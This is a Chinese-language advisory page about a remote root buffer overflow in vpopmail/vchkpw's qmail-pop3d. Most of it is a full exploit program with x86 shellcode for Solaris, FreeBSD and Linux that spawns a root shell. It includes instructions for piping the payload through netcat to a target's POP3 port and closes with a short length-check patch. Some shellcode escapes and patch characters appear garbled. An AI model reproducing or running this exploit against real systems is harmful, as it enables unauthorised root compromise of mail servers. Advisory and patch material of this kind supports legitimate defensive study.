vpopmail/vchkpw存在远程溢出漏洞,使入侵者能远程获得root权限
由于vpopmail/vchkpw版本pop3d程序中的popup.c对边界检查的错误,使得该程序存在远程溢出。而该程序一般又是以root身份启动的,所以远程的入侵者将可能利用该漏洞远程获得您系统的root权限。
以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负。
----------------------------
/*
qmail-qpop3d-vchkpw.c (v.3)
by: K2,
The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
has big problems ;)
gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110
play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
vpopmail-3.4.10a/vpopmail-3.4.11[b-e]
Hi plaguez.
prop's to Interrupt for testing with bsd, _eixon an others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif
char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
"xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
"x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
"xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
"x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
"xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
"x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";
#elif BSD // fBSD shellcode, mudge@l0pht.com
"xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
"x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
"x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
"x9a>:)(:<xe8xc6xffxffxff/bin/sh";
#else // Linux shellcode, no idea
"xebx22x5ex89xf3x89xf7x83xc7x07x31xc0xaa"
"x89xf9x89xf0xabx89xfax31xc0xabxb0x08x04"
"x03xcdx80x31xdbx89xd8x40xcdx80xe8xd9xff"
"xffxff/bin/shxff";
#endif
int main(int argc, char **argv)
{
int i=0,esp=0,offset=0,nop=NOPDEF;
char buffer[SIZE];
if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtol(argv[2], NULL, 0);
esp = DEFOFF;
memset(buffer, NOP, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
*((int *) &buffer[i]) = esp+offset;
}
printf("user %s ",buffer);
printf("pass ADMR0X&*!(#&*(! ");
fprintf(stderr," buflen = %d, nops = %d, target = 0x%x ",strlen(buffer),nop,esp+offset);
return(0);
}
--------------------------------------------------------------------
解决方案:
请临时使用这个由该漏洞发现者发布的补丁程序修补vpopmail/vchkpw
---------------------------------------------------------------
#include "readwrite.h"
#include "timeoutread.h"
#include "timeoutwrite.h"
+#include <unistd.h>
+#include <syslog.h>
void die() { _exit(1); }
@@ -87,6 +89,24 @@
int child;
int wstat;
int pi[2];
+
+ /*
+ This patch should have minimal impact of normal qmail operations.
+ It was coded/tested under linux, but should work most everywhere.
+ */
+
+ if(strlen(user) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
+ user[39]='';
+ userlen=strlen(user);
+ }
+
+ if(strlen(pass) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
+ pass[39]='';
+ }
if (fd_copy(2,1) == -1) die_pipe();
close(3);
视频教程列表
文章教程搜索
C语言程序设计推荐教程
C语言程序设计热门教程
|